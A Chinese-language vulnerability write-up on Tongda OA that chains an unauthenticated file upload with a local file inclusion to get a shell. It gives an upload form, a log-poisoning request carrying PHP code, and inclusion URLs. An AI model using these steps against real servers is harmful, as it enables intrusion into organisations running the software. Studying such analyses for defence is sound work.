通达OA文件上传/文件包含GetShell

前言
 先来看看该漏洞的利用方式
 
绕过文件上传然后包含
 
包含日志文件
 
再来看看通达oa的信息
       通达信科隶属于世界500强企业。
 
       中国兵器工业信息中心通达信科隶属于中国兵器工业集团
 
       通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户,超过500万终端用户
 
影响版本:
  • V11版
  • 2017版
  • 2016版
  • 2015版
  • 2013版
  • 2013增强版

 
 
[b]漏洞分析[/b] 
跟进这个文件  ispirit/im/upload.php  
<?php
set_time_limit(0);
$P = $_POST['P'];
if (isset($P) || $P != '') {
ob_start();
include_once 'inc/session.php';
session_id($P);
session_start();
session_write_close();
} else {
include_once './auth.php';
}
这里在数据包里面对p赋值可以绕过登录限制直接上传文件
 

td1.png

这里显示的是未登录
 

td2.png

 
在这里已经绕过登录进行了文件的上传
 

td2.5_.png

 
 
在本地自己构造一个文件上传的页面
<html>
<body>
<form action="http://127.0.0.1:8889/ispirit/im/upload.php" method="post" enctype="multipart/form-data">
<input type="text"name='P' value = 1 ></input>
<input type="text"name='MSG_CATE' value = 'file'></input>
<input type="text"name='UPLOAD_MODE' value = 1 ></input>
<input type="text" name="DEST_UID" value = 1></input>
<input type="file" name="ATTACHMENT"></input>
<input type="submit" ></input>
</body>
</html>

td3.png

 
文件名为  随机数字.文件名.格式
 
包含点为  \ispirit\interface\gateway.php
if ($json) {
$json = stripcslashes($json);
$json = (array) json_decode($json);
foreach ($json as $key => $val ) {
if ($key == "data") {
$val = (array) $val;
foreach ($val as $keys => $value ) {
$keys = $value;
}
}
if ($key == "url") {
$url = $val;
}
}
if ($url != "") {
if (substr($url, 0, 1) == "/") {...}
if ((strpos($url, "general/") !== false) || (strpos($url, "ispirit/") !== false) || (strpos($url, "module/") !== false)) {
include_once $url;
}
}
exit();
}
最后面存在一个包含点
 
直接get传参就行
 
先访问/ispirit/interface/gateway.php?json={}&aa=<?php file_put_contents('1.php','hello world');?>往日志里卖写一句话
 
在访问日志  ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log
 
也可以访问刚才上传的图片
 
以post的方式
 
json={"url":"general/../../attach/im/2004/711609261.01.jpg"}
 

td5.png

 
 
后面会给出exp
 
参考:
https://blog.csdn.net/q851579181q/article/details/104968391
https://blog.csdn.net/god_zzZ/article/details/105192808?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522158579892119725211960470%2522%252C%2522scm%2522%253A%252220140713.130056874..%2522%257D&request_id=158579892119725211960470&biz_id=0&utm_source=distribute.pc_search_result.none-task
 

0 个评论

要回复文章请先登录注册